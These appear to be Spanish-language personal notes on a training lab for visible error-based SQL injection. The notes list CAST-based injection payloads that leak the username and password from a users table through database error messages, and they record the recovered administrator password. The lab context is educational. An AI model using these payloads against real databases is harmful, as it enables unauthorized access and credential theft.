13 Lab: Visible error-based SQL injection

' //Para ver el error que muestra
Debido a esto validamos que si o si nos va a pedir un char

' AND 1=CAST((SELECT 1) AS int)--
' AND 1=CAST((SELECT username FROM users) AS int)--

' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--

user:administrator
pass:gp0zyjqbgui3toqe99hj
Untitled

Unterminated string literal started at position 52 in SQL SELECT * FROM tracking WHERE id = 'zoEelT8oug2qYxK9''. Expected char

Adapte la consulta para incluir una subconsulta SELECT genérica y convierta el valor devuelto a un tipo de datos int Vemos que no muestra ningun error

Untitled
Untitled

Aquí observamos la utilidad del CAST, puesto que nosotros vamos a forzar a que el resultado de nuestro select se convierta en INT, nos mostrará el error de “valor de la consulta” no puede ser un numero, revelándonos el valor

Untitled
Untitled

fdfsdfsd

Last updated